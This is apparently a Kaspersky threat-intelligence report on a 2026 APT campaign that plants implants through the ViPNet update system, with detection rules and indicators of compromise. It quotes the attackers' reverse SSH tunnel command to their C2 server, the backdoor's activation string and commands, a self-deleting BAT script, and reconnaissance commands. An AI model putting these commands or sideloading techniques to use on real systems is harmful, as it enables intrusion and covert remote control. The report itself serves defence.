HelloNet campaign โ€” new malicious modules launched through the ViPNet update system
Securelist by Kaspersky

HelloNet campaign - new malicious modules launched through the ViPNet update system

HelloNet campaign - new malicious modules launched through the ViPNet update system

We identified targeted infection attempts against large Russian organizations using the ViPNet update system (a software suite for creating secure networks).

UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response.

UPD 16.07.2026: Added detection rules and examples using KEDR Expert.

UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module.

UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs.

We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks).

During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates.

Persistence via the update system

On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique - the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component.

HelloInjector - a loader for additional malicious components

The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload.

After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions.

After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text.

HelloProxy - a tool for traffic proxying and launching new malicious payloads

The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library.

The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes:

  • AFD_RECV (0x12017)
  • AFD_GET_TDI_HANDLES (0x12037)

These codes are used during socket operations - their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages.

The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\users\public\tesh4RPC.txt in the format:

| 1 | threadid: pid= \r\n |

After installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF.

After the successful completion of the handshake, the processing of incoming commands continues. Depending on the received command, there are two execution branches:

  • Working as a proxy. The malware accepts strings in the following format: 1 :<address>:<port>. Afterwards, it creates new sockets and starts forwarding traffic between them.
  • Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread.

During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader's operation:

  • An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system;
  • A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers' actions in the system.

We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed:

query user
ipconfig /all
ping 8.8.8.8 -n 1
net user /do
net group /do
dir "C:\Program Files (x86)"
dir "C:\Program Files (x86)\infotecs\"
dir "C:\Program Files (x86)\infotecs\ViPNet Administrator"
dir "C:\Program Files (x86)\infotecs\ViPNet Client\Export"
dir "C:\Program Files (x86)\infotecs\ViPNet Client"
dir "ะก:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\"
dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network "
dir c:\users\[username]
query user
dir C:\Users\Public\music

In these commands, the mention of the directory C:\Users\Public\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers' command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols):

C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]

HelloBackdoor - a Rust-based backdoor for file system manipulations

In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string "hello\n") to activate the backdoor.

This backdoor further accepts the following commands:

  • !upload - upload a file to the infected machine
  • !down - download a file from the infected machine
  • !stop - stop the backdoor's operation

For this, a BAT file is created and executed with the following content:

@echo off
:loop
if exist <filename> (
    del /F /Q <filename>
    if exist <filename> goto loop
)
sc stop iplircontrol >nul
timeout 5 > nul
sc start iplircontrol > nul
(goto) 2>nul & del /F /Q %0

If the command text did not match the above listed, the command is executed using cmd.exe.

Attribution

During the analysis of one of the wtsapi32.dll file samples, we found an unused string:

GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n

It refers to the news portal sina.com, which is popular in China. In addition, analyzing the strings in the HelloBackdoor backdoor, we established that during compilation, Rust packages (crates) were downloaded from the mirror mirrors.ustc.edu.cn. Most likely, these strings remained in the malicious files unintentionally. However, the probability of using "false flags" implanted by attackers to complicate the attribution process cannot be excluded.

At present, we link this campaign to the activities of an unknown Chinese-speaking APT group with a low degree of confidence.

Recommendations

Given that ViPNet software is not the first time being used by advanced attackers to conduct cyberattacks, we recommend paying special attention to the protection of workstations with this software. In particular, network traffic monitoring should be configured on the ports specified in the article for timely detection of signs of compromise.

Countering complex targeted attacks requires a comprehensive approach that combines security technologies operating at various stages of the cyberattack lifecycle. Such a multi-level security model helps not only to detect but also to prevent incidents of this class. This approach is embedded in the architecture of the Kaspersky Symphony line of solutions, designed to protect businesses from APT-level threats, including attacks similar to the one described in this article.

Kaspersky solutions detect this threat using the following verdicts:

  • Trojan.Win32.Agentb.ttoe
  • Trojan.Win64.Convagent.gen
  • Trojan.Win64.Agent.smgpqx
  • HEUR:Trojan.Win64.DllHijacking.gen

Detection by Kaspersky solutions

Kaspersky security solutions, such as Kaspersky Endpoint Detection and Response Expert, successfully detect malicious activity within the described attacks. One practical method of detection is monitoring renamed PuTTY/Plink binaries rather than relying on the file name: even if the executable is named frontpage.exe, its PE header, version, strings, and hash match the original Plink, which is confirmed by EDR events. Additionally, it is worth paying attention to the specific command line with which the process was launched. The KEDR Expert solution detects this activity using the using_plink_or_putty_for_port_forwarding rule.

It is also important to monitor Process Injection into svchost.exe originating from the ViPNet update process itcsrvup64.exe, since this component should not legitimately inject code into system processes. Such behavior is a characteristic indicator of HelloInjector activity, which uses a trusted and signed process to mask malicious injection. The KEDR Expert solution detects this activity using the vipnet_load_library_code_injection rule.

Another effective way to detect malicious activity associated with ViPNet is monitoring network traffic. The Kaspersky Anti Targeted Attack (KATA) solution with the NDR module detects this activity using the IDS module and a Suricata rule for the HelloBackdoor backdoor activity. The rule is implemented based on the first packet expected by the malware. It accepts TCP connections on port 443, expecting to receive the command 47c6235b4d2611184 (part of the MD5 hash of the string "hello\n"), which activates the backdoor.

The Kaspersky Managed Detection and Response service detects this attack using the following indicators:

  • Monitoring the creation of the wtsapi32.dll library in the C:\Program Files (x86)\InfoTeCS\VIPNet Update System directory.
  • Monitoring the launch of unusual processes (not typical for ViPNet, lacking an InfoTeCS signature) by the ViPNet update process (Itcsrvup64.exe or Itcsrvup.exe).
  • Creation of library files (.dll) in a directory associated with ViPNet (by default, VIPNet Update System or VIPNET CLIENT) by ViPNet processes.
  • Atypical activity (file creation/process execution) from an instance of the svchost.exe process.
  • Creation of executable files in directories that are writable by default (%ProgramData%, %TEMP%, %SystemRoot%\Temp, C:\Users\Public\music|pictures|videos|contacts|links|libraries).
  • Monitoring the creation of tunnels using ssh or plink processes (identification is performed based on the original PE file name, not the executable file name); the detection is based on the presence of substrings like port:address:port and their variations in the command line.

Indicators of Compromise

HelloBackdoor

  • 16C211C96735F2FAE9361B89BD7A31BF
  • 1BFE2B9493128574907A8279256A8BCC
  • f9eed2f0158dc98e7012fb809152209c - #new

HelloBackdoor Droppers

  • 6001829A128FE264B4403138700C11A8 - infotecs\vipnet client\puh.exe - #new
  • EE4FF46DDD8489E81447962F927BC3F6 - infotecs\vipnet client\store.exe - #new

Utility for adding exclusions to Windows Defender

  • 41c938b3cd7e55d4077e34976929b140 - #new

wtsapi32.dll

  • B103CD21280B4061F88B2BCC51394894
  • 9F5606A0755BC633B9BD7DB6D179C09E
  • 0CFDFFC56F0FA325D0C4D24780B46597

Network indicators

  • 5.39.253[.]206
  • 176.32.34[.]135 - #new

Detected TTPs - #new

  • T1569.002 - System Services: Service Execution - "cmd" /c sc start UrBackupClientBackend
  • T1016 - System Network Configuration Discovery - "cmd" /c arp -a - "cmd" /c route print
  • T1049 - System Network Connections Discovery - "cmd" /c netstat -ano
  • T1018 - Remote System Discovery - "cmd" /c ping mail.ru -n 2
  • T1082 - System Information Discovery - "cmd" /c systeminfo
  • T1057 - Process Discovery - "cmd" /c tasklist
  • T1007 - System Service Discovery - "cmd" /c sc query UrBackupClientBackend
  • T1083 - File and Directory Discovery - "cmd" /c dir temp*.tmp - "cmd" /c dir $temp\*.tmp - "cmd" /c dir amgmt* - "cmd" /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669 - "cmd" /c dir $public\libraries\ - "cmd" /c dir d:\WindowsImageBackup
  • T1005 - Data from Local System - "cmd" /c type $temp\TS_E9E3.tmp - "cmd" /c type $temp\Acr6F3D.tmp
  • T1074.001 - Local Data Staging - "cmd" /c copy appdata\inf

Comments

No comments yet. Start the discussion.